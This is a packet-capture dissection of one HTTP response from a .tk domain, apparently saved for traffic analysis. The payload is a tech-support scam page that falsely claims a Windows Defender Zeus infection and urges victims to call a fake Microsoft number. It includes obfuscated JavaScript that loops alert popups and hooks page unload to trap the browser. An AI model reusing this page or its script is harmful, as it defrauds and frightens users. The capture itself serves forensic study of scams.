Frame 9533: 259 bytes on wire (2072 bits), 259 bytes captured (2072 bits) Encapsulation type: Ethernet (1) Arrival Time: Oct 21, 2017 05:03:26.098046000 UTC [Time shift for this packet: 0.000000000 seconds] Epoch Time: 1508562206.098046000 seconds [Time delta from previous captured frame: 0.000002000 seconds] [Time delta from previous displayed frame: 0.000000000 seconds] [Time since reference or first frame: 692.784543000 seconds] Frame Number: 9533 Frame Length: 259 bytes (2072 bits) Capture Length: 259 bytes (2072 bits) [Frame is marked: False] [Frame is ignored: False] [Protocols in frame: eth:ethertype:ip:tcp:http:data:data-text-lines] Ethernet II, Src: LinksysG_f8:1a:ac (00:04:5a:f8:1a:ac), Dst: AsustekC_6a:b2:1f (60:a4:4c:6a:b2:1f) Destination: AsustekC_6a:b2:1f (60:a4:4c:6a:b2:1f) Address: AsustekC_6a:b2:1f (60:a4:4c:6a:b2:1f) .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default) .... ...0 .... .... .... .... = IG bit: Individual address (unicast) Source: LinksysG_f8:1a:ac (00:04:5a:f8:1a:ac) Address: LinksysG_f8:1a:ac (00:04:5a:f8:1a:ac) .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default) .... ...0 .... .... .... .... = IG bit: Individual address (unicast) Type: IPv4 (0x0800) Internet Protocol Version 4, Src: 162.244.35.36, Dst: 10.0.1.95 0100 .... = Version: 4 .... 0101 = Header Length: 20 bytes (5) Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT) 0000 00.. = Differentiated Services Codepoint: Default (0) .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0) Total Length: 245 Identification: 0x298a (10634) Flags: 0x0000 0... .... .... .... = Reserved bit: Not set .0.. .... .... .... = Don't fragment: Not set ..0. .... .... .... = More fragments: Not set ...0 0000 0000 0000 = Fragment offset: 0 Time to live: 128 Protocol: TCP (6) Header checksum: 0x3f02 [validation disabled] [Header checksum status: Unverified] Source: 162.244.35.36 Destination: 10.0.1.95 [Source GeoIP: US, ASN 14576, HOSTING-SOLUTIONS] [Source GeoIP Country: United States] [Source or Destination GeoIP Country: United States] [Source GeoIP ISO Two Letter Country Code: US] [Source or Destination GeoIP ISO Two Letter Country Code: US] [Source GeoIP AS Number: 14576] [Source or Destination GeoIP AS Number: 14576] [Source GeoIP AS Organization: HOSTING-SOLUTIONS] [Source or Destination GeoIP AS Organization: HOSTING-SOLUTIONS] [Source GeoIP Latitude: 37.751] [Source or Destination GeoIP Latitude: 37.751] [Source GeoIP Longitude: -97.822] [Source or Destination GeoIP Longitude: -97.822] Transmission Control Protocol, Src Port: 80, Dst Port: 61356, Seq: 4381, Ack: 282, Len: 205 Source Port: 80 Destination Port: 61356 [Stream index: 321] [TCP Segment Len: 205] Sequence number: 4381 (relative sequence number) [Next sequence number: 4586 (relative sequence number)] Acknowledgment number: 282 (relative ack number) 0101 .... = Header Length: 20 bytes (5) Flags: 0x018 (PSH, ACK) 000. .... .... = Reserved: Not set ...0 .... .... = Nonce: Not set .... 0... .... = Congestion Window Reduced (CWR): Not set .... .0.. .... = ECN-Echo: Not set .... ..0. .... = Urgent: Not set .... ...1 .... = Acknowledgment: Set .... .... 1... = Push: Set .... .... .0.. = Reset: Not set .... .... ..0. = Syn: Not set .... .... ...0 = Fin: Not set [TCP Flags: ·······AP···] Window size value: 64240 [Calculated window size: 64240] [Window size scaling factor: -2 (no window scaling used)] Checksum: 0x04b9 [unverified] [Checksum Status: Unverified] Urgent pointer: 0 [SEQ/ACK analysis] [iRTT: 0.080817000 seconds] [Bytes in flight: 4585] [Bytes sent since last PSH flag: 4585] [Timestamps] [Time since first frame in this TCP stream: 0.371721000 seconds] [Time since previous frame in this TCP stream: 0.000002000 seconds] TCP payload (205 bytes) TCP segment data (205 bytes) [4 Reassembled TCP Segments (4585 bytes): #9530(1460), #9531(1460), #9532(1460), #9533(205)] [Frame: 9530, payload: 0-1459 (1460 bytes)] [Frame: 9531, payload: 1460-2919 (1460 bytes)] [Frame: 9532, payload: 2920-4379 (1460 bytes)] [Frame: 9533, payload: 4380-4584 (205 bytes)] [Segment count: 4] [Reassembled TCP length: 4585] [Reassembled TCP Data: 485454502f312e3120323030204f4b0d0a5365727665723a...] Hypertext Transfer Protocol HTTP/1.1 200 OK\r\n [Expert Info (Chat/Sequence): HTTP/1.1 200 OK\r\n] [HTTP/1.1 200 OK\r\n] [Severity level: Chat] [Group: Sequence] Response Version: HTTP/1.1 Status Code: 200 [Status Code Description: OK] Response Phrase: OK Server: nginx/1.10.2\r\n Date: Sat, 21 Oct 2017 05:03:27 GMT\r\n Content-Type: text/html; charset=UTF-8\r\n Transfer-Encoding: chunked\r\n Keep-Alive: timeout=3\r\n X-Frame-Options: SAMEORIGIN\r\n \r\n [HTTP response 1/1] [Time since request: 0.290528000 seconds] [Request in frame: 9526] [Request URI: http://krep2010123.tk/?number=888-779-0939] HTTP chunked response Data chunk (4374 octets) Chunk size: 4374 octets Data (4374 bytes) 0000 0d 0a 20 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 .. ......... 0080 0a 3c 74 69 74 6c 65 3e 53 65 63 75 72 69 74 79 .Security 0090 20 57 61 72 6e 69 6e 67 3c 2f 74 69 74 6c 65 3e Warning 00a0 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d ......... 01c0 0a 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e ......... 03e0 0d 0a 3c 73 6f 75 72 63 65 20 73 72 63 3d 22 2f ......< 0420 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 div style="width 0430 3a 38 35 25 3b 20 6d 61 72 67 69 6e 3a 61 75 74 :85%; margin:aut 0440 6f 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 o; padding-top:5 0450 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f %; background-co 0460 6c 6f 72 3a 23 30 30 37 38 44 37 3b 22 3e 0d 0a lor:#0078D7;">.. 0470 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74
..
..

Windows Defen 0590 64 65 72 20 41 6c 65 72 74 20 3a 20 5a 65 75 73 der Alert : Zeus 05a0 20 56 69 72 75 73 20 44 65 74 65 63 74 65 64 20 Virus Detected 05b0 49 6e 20 59 6f 75 72 20 43 6f 6d 70 75 74 65 72 In Your Computer 05c0 20 21 21 3c 2f 68 31 3e 0d 0a 3c 68 33 20 73 74 !!

..

Please Do No 0610 74 20 53 68 75 74 20 44 6f 77 6e 20 6f 72 20 52 t Shut Down or R 0620 65 73 65 74 20 59 6f 75 72 20 43 6f 6d 70 75 74 eset Your Comput 0630 65 72 2e 3c 2f 68 33 3e 0d 0a 3c 64 69 76 20 73 er.

..
< 06b0 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c /div>..
The 0720 20 66 6f 6c 6c 6f 77 69 6e 67 20 64 61 74 61 20 following data 0730 77 69 6c 6c 20 62 65 20 63 6f 6d 70 72 6f 6d 69 will be compromi 0740 73 65 64 20 69 66 20 79 6f 75 20 63 6f 6e 74 69 sed if you conti 0750 6e 75 65 3a 0d 0a 3c 62 72 2f 3e 0d 0a 31 2e 20 nue:..
..1. 0760 50 61 73 73 77 6f 72 64 73 0d 0a 3c 62 72 2f 3e Passwords..
0770 0d 0a 32 2e 20 42 72 6f 77 73 65 72 20 48 69 73 ..2. Browser His 0780 74 6f 72 79 0d 0a 3c 62 72 2f 3e 0d 0a 33 2e 20 tory..
..3. 0790 43 72 65 64 69 74 20 43 61 72 64 20 49 6e 66 6f Credit Card Info 07a0 72 6d 61 74 69 6f 6e 0d 0a 3c 62 72 2f 3e 0d 0a rmation..
.. 07b0 34 2e 4c 6f 63 61 6c 20 48 61 72 64 20 44 69 73 4.Local Hard Dis 07c0 6b 20 46 69 6c 65 73 2e 0d 0a 3c 62 72 2f 3e 0d k Files...
. 07d0 0a 3c 62 72 2f 3e 0d 0a 54 68 69 73 20 76 69 72 .
..This vir 07e0 75 73 20 69 73 20 77 65 6c 6c 20 6b 6e 6f 77 6e us is well known 07f0 20 66 6f 72 20 63 6f 6d 70 6c 65 74 65 20 69 64 for complete id 0800 65 6e 74 69 74 79 20 61 6e 64 20 63 72 65 64 69 entity and credi 0810 74 20 63 61 72 64 20 74 68 65 66 74 2e 20 46 75 t card theft. Fu 0820 72 74 68 65 72 20 61 63 74 69 6f 6e 20 74 68 72 rther action thr 0830 6f 75 67 68 20 74 68 69 73 20 63 6f 6d 70 75 74 ough this comput 0840 65 72 20 6f 72 20 61 6e 79 20 63 6f 6d 70 75 74 er or any comput 0850 65 72 20 6f 6e 20 74 68 65 20 6e 65 74 77 6f 72 er on the networ 0860 6b 20 77 69 6c 6c 20 72 65 76 65 61 6c 20 70 72 k will reveal pr 0870 69 76 61 74 65 20 69 6e 66 6f 72 6d 61 74 69 6f ivate informatio 0880 6e 20 61 6e 64 20 69 6e 76 6f 6c 76 65 20 73 65 n and involve se 0890 72 69 6f 75 73 20 72 69 73 6b 73 2e 3c 2f 64 69 rious risks...

Cal 08f0 6c 20 4d 69 63 72 6f 73 6f 66 74 20 54 65 63 68 l Microsoft Tech 0900 6e 69 63 61 6c 20 44 65 70 61 72 74 6d 65 6e 74 nical Department 0910 3a 20 38 38 38 2d 37 37 39 2d 30 39 33 39 20 28 : 888-779-0939 ( 0920 54 6f 6c 6c 20 46 72 65 65 29 3c 2f 68 31 3e 3c Toll Free)

< 0930 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c /div>..
..< 0940 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c /div>..
..< 0950 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 script type="tex 0960 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a t/javascript">.. 0970 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 var text 0980 20 3d 20 27 57 69 6e 64 6f 77 73 20 44 65 66 65 = 'Windows Defe 0990 6e 64 65 72 20 41 6c 65 72 74 20 3a 20 5a 65 75 nder Alert : Zeu 09a0 73 20 56 69 72 75 73 20 44 65 74 65 63 74 65 64 s Virus Detected 09b0 20 49 6e 20 59 6f 75 72 20 43 6f 6d 70 75 74 65 In Your Compute 09c0 72 20 21 21 20 5c 6e 20 50 6c 65 61 73 65 20 44 r !! \n Please D 09d0 6f 20 4e 6f 74 20 53 68 75 74 20 44 6f 77 6e 20 o Not Shut Down 09e0 6f 72 20 52 65 73 65 74 20 59 6f 75 72 20 43 6f or Reset Your Co 09f0 6d 70 75 74 65 72 2e 20 5c 6e 5c 6e 20 54 68 65 mputer. \n\n The 0a00 20 66 6f 6c 6c 6f 77 69 6e 67 20 64 61 74 61 20 following data 0a10 77 69 6c 6c 20 62 65 20 63 6f 6d 70 72 6f 6d 69 will be compromi 0a20 73 65 64 20 69 66 20 79 6f 75 20 63 6f 6e 74 69 sed if you conti 0a30 6e 75 65 3a 20 5c 6e 20 31 2e 20 50 61 73 73 77 nue: \n 1. Passw 0a40 6f 72 64 73 20 5c 6e 20 32 2e 20 42 72 6f 77 73 ords \n 2. Brows 0a50 65 72 20 48 69 73 74 6f 72 79 20 5c 6e 20 33 2e er History \n 3. 0a60 20 43 72 65 64 69 74 20 43 61 72 64 20 49 6e 66 Credit Card Inf 0a70 6f 72 6d 61 74 69 6f 6e 20 5c 6e 20 34 2e 4c 6f ormation \n 4.Lo 0a80 63 61 6c 20 48 61 72 64 20 44 69 73 6b 20 46 69 cal Hard Disk Fi 0a90 6c 65 73 2e 20 5c 6e 5c 6e 20 54 68 69 73 20 76 les. \n\n This v 0aa0 69 72 75 73 20 69 73 20 77 65 6c 6c 20 6b 6e 6f irus is well kno 0ab0 77 6e 20 66 6f 72 20 63 6f 6d 70 6c 65 74 65 20 wn for complete 0ac0 69 64 65 6e 74 69 74 79 20 61 6e 64 20 63 72 65 identity and cre 0ad0 64 69 74 20 63 61 72 64 20 74 68 65 66 74 2e 20 dit card theft. 0ae0 46 75 72 74 68 65 72 20 61 63 74 69 6f 6e 20 74 Further action t 0af0 68 72 6f 75 67 68 20 74 68 69 73 20 63 6f 6d 70 hrough this comp 0b00 75 74 65 72 20 6f 72 20 61 6e 79 20 63 6f 6d 70 uter or any comp 0b10 75 74 65 72 20 6f 6e 20 74 68 65 20 6e 65 74 77 uter on the netw 0b20 6f 72 6b 20 77 69 6c 6c 20 72 65 76 65 61 6c 20 ork will reveal 0b30 70 72 69 76 61 74 65 20 69 6e 66 6f 72 6d 61 74 private informat 0b40 69 6f 6e 20 61 6e 64 20 69 6e 76 6f 6c 76 65 20 ion and involve 0b50 73 65 72 69 6f 75 73 20 72 69 73 6b 73 2e 20 5c serious risks. \ 0b60 6e 20 5c 6e 20 43 61 6c 6c 20 4d 69 63 72 6f 73 n \n Call Micros 0b70 6f 66 74 20 54 65 63 68 6e 69 63 61 6c 20 44 65 oft Technical De 0b80 70 61 72 74 6d 65 6e 74 3a 20 38 38 38 2d 37 37 partment: 888-77 0b90 39 2d 30 39 33 39 20 28 54 6f 6c 6c 20 46 72 65 9-0939 (Toll Fre 0ba0 65 29 27 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 e)';.. va 0bb0 72 20 74 65 78 74 5f 73 68 6f 72 74 20 3d 20 27 r text_short = ' 0bc0 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 Windows Defender 0bd0 20 41 6c 65 72 74 20 3a 20 5a 65 75 73 20 56 69 Alert : Zeus Vi 0be0 72 75 73 20 44 65 74 65 63 74 65 64 20 49 6e 20 rus Detected In 0bf0 59 6f 75 72 20 43 6f 6d 70 75 74 65 72 21 21 20 Your Computer!! 0c00 43 61 6c 6c 20 4d 69 63 72 6f 73 6f 66 74 20 54 Call Microsoft T 0c10 65 63 68 6e 69 63 61 6c 20 44 65 70 61 72 74 6d echnical Departm 0c20 65 6e 74 3a 20 38 38 38 2d 37 37 39 2d 30 39 33 ent: 888-779-093 0c30 39 20 28 54 6f 6c 6c 20 46 72 65 65 29 27 3b 0d 9 (Toll Free)';. 0c40 0a 20 20 20 20 20 20 20 20 2f 2f 20 73 63 28 74 . // sc(t 0c50 65 78 74 2c 20 74 65 78 74 5f 73 68 6f 72 74 29 ext, text_short) 0c60 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f ;.. var _ 0c70 30 78 62 33 63 39 3d 5b 22 5c 78 32 41 5c 78 32 0xb3c9=["\x2A\x2 0c80 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0c90 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0ca0 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0cb0 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0cc0 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0cd0 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0ce0 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0cf0 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0d00 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0d10 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0d20 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0d30 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 30 A\x2A\x2A\x2A\x0 0d40 41 5c 78 35 32 5c 78 34 34 5c 78 34 45 5c 78 32 A\x52\x44\x4E\x2 0d50 46 5c 78 35 39 5c 78 36 31 5c 78 36 38 5c 78 34 F\x59\x61\x68\x4 0d60 43 5c 78 36 46 5c 78 37 36 5c 78 36 35 5c 78 37 C\x6F\x76\x65\x7 0d70 32 5c 78 32 45 5c 78 37 37 5c 78 36 46 5c 78 37 2\x2E\x77\x6F\x7 0d80 32 5c 78 36 44 5c 78 32 31 5c 78 33 30 5c 78 33 2\x6D\x21\x30\x3 0d90 35 5c 78 33 35 5c 78 34 32 5c 78 34 33 5c 78 34 5\x35\x42\x43\x4 0da0 33 5c 78 34 31 5c 78 34 33 5c 78 33 39 5c 78 34 3\x41\x43\x39\x4 0db0 36 5c 78 34 35 5c 78 34 33 5c 78 32 30 5c 78 34 6\x45\x43\x20\x4 0dc0 39 5c 78 36 45 5c 78 36 36 5c 78 36 35 5c 78 36 9\x6E\x66\x65\x6 0dd0 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 3\x74\x69\x6F\x6 0de0 45 5c 78 30 41 5c 78 32 41 5c 78 32 41 5c 78 32 E\x0A\x2A\x2A\x2 0df0 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e00 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e10 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e20 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e30 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e40 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e50 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e60 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e70 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e80 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0e90 41 5c 78 32 41 5c 78 32 41 5c 78 32 41 5c 78 32 A\x2A\x2A\x2A\x2 0ea0 41 5c 78 32 41 5c 78 32 41 5c 78 30 41 5c 78 30 A\x2A\x2A\x0A\x0 0eb0 41 22 2c 22 5c 78 36 31 5c 78 36 34 5c 78 36 34 A","\x61\x64\x64 0ec0 5c 78 34 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 \x45\x76\x65\x6E 0ed0 5c 78 37 34 5c 78 34 43 5c 78 36 39 5c 78 37 33 \x74\x4C\x69\x73 0ee0 5c 78 37 34 5c 78 36 35 5c 78 36 45 5c 78 36 35 \x74\x65\x6E\x65 0ef0 5c 78 37 32 22 2c 22 5c 78 36 32 5c 78 36 46 5c \x72","\x62\x6F\ 0f00 78 36 34 5c 78 37 39 22 2c 22 5c 78 36 44 5c 78 x64\x79","\x6D\x 0f10 36 46 5c 78 37 35 5c 78 37 33 5c 78 36 35 5c 78 6F\x75\x73\x65\x 0f20 36 46 5c 78 37 35 5c 78 37 34 22 2c 22 5c 78 36 6F\x75\x74","\x6 0f30 46 5c 78 36 45 5c 78 36 44 5c 78 36 46 5c 78 37 F\x6E\x6D\x6F\x7 0f40 35 5c 78 37 33 5c 78 36 35 5c 78 36 46 5c 78 37 5\x73\x65\x6F\x7 0f50 35 5c 78 37 34 22 2c 22 5c 78 36 31 5c 78 37 34 5\x74","\x61\x74 0f60 5c 78 37 34 5c 78 36 31 5c 78 36 33 5c 78 36 38 \x74\x61\x63\x68 0f70 5c 78 34 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 \x45\x76\x65\x6E 0f80 5c 78 37 34 22 2c 22 5c 78 36 46 5c 78 36 45 5c \x74","\x6F\x6E\ 0f90 78 36 32 5c 78 36 35 5c 78 36 36 5c 78 36 46 5c x62\x65\x66\x6F\ 0fa0 78 37 32 5c 78 36 35 5c 78 37 35 5c 78 36 45 5c x72\x65\x75\x6E\ 0fb0 78 36 43 5c 78 36 46 5c 78 36 31 5c 78 36 34 22 x6C\x6F\x61\x64" 0fc0 5d 3b 61 6c 65 72 74 28 5f 30 78 62 33 63 39 5b ];alert(_0xb3c9[ 0fd0 30 5d 2b 20 74 65 78 74 29 3b 69 66 28 64 6f 63 0]+ text);if(doc 0fe0 75 6d 65 6e 74 5b 5f 30 78 62 33 63 39 5b 32 5d ument[_0xb3c9[2] 0ff0 5d 5b 5f 30 78 62 33 63 39 5b 31 5d 5d 29 7b 64 ][_0xb3c9[1]]){d 1000 6f 63 75 6d 65 6e 74 5b 5f 30 78 62 33 63 39 5b ocument[_0xb3c9[ 1010 32 5d 5d 5b 5f 30 78 62 33 63 39 5b 31 5d 5d 28 2]][_0xb3c9[1]]( 1020 5f 30 78 62 33 63 39 5b 33 5d 2c 66 75 6e 63 74 _0xb3c9[3],funct 1030 69 6f 6e 28 5f 30 78 63 36 38 36 78 31 29 7b 61 ion(_0xc686x1){a 1040 6c 65 72 74 28 5f 30 78 62 33 63 39 5b 30 5d 2b lert(_0xb3c9[0]+ 1050 20 74 65 78 74 29 7d 2c 66 61 6c 73 65 29 7d 65 text)},false)}e 1060 6c 73 65 20 7b 64 6f 63 75 6d 65 6e 74 5b 5f 30 lse {document[_0 1070 78 62 33 63 39 5b 32 5d 5d 5b 5f 30 78 62 33 63 xb3c9[2]][_0xb3c 1080 39 5b 35 5d 5d 28 5f 30 78 62 33 63 39 5b 34 5d 9[5]](_0xb3c9[4] 1090 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 63 36 38 ,function(_0xc68 10a0 36 78 31 29 7b 61 6c 65 72 74 28 5f 30 78 62 33 6x1){alert(_0xb3 10b0 63 39 5b 30 5d 2b 20 74 65 78 74 29 7d 29 7d 3b c9[0]+ text)})}; 10c0 77 69 6e 64 6f 77 5b 5f 30 78 62 33 63 39 5b 36 window[_0xb3c9[6 10d0 5d 5d 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 ]]= function(){r 10e0 65 74 75 72 6e 20 74 65 78 74 5f 73 68 6f 72 74 eturn text_short 10f0 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e }.. 1100 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d ........ Data: 0d0a200d0a3c21444f43545950452068746d6c3e0d0a3c68... [Length: 4374] Chunk boundary: 0d0a End of chunked encoding Chunk size: 0 octets \r\n File Data: 4374 bytes Line-based text data: text/html (49 lines) \r\n \r\n \r\n \r\n \r\n \r\n Security Warning\r\n \r\n \r\n \r\n \r\n \r\n \r\n [truncated]\r\n \r\n \r\n
\r\n
\r\n
\r\n

Windows Defender Alert : Zeus Virus Detected In Your Computer !!

\r\n

Please Do Not Shut Down or Reset Your Computer.

\r\n
\r\n
The following data will be compromised if you continue:\r\n
\r\n 1. Passwords\r\n
\r\n 2. Browser History\r\n
\r\n 3. Credit Card Information\r\n
\r\n 4.Local Hard Disk Files.\r\n
\r\n
\r\n This virus is well known for complete identity and credit card theft. Further action through this computer or any computer on the network will reveal private information and involve serious risks.
\r\n

Call Microsoft Technical Department: 888-779-0939 (Toll Free)

\r\n
\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n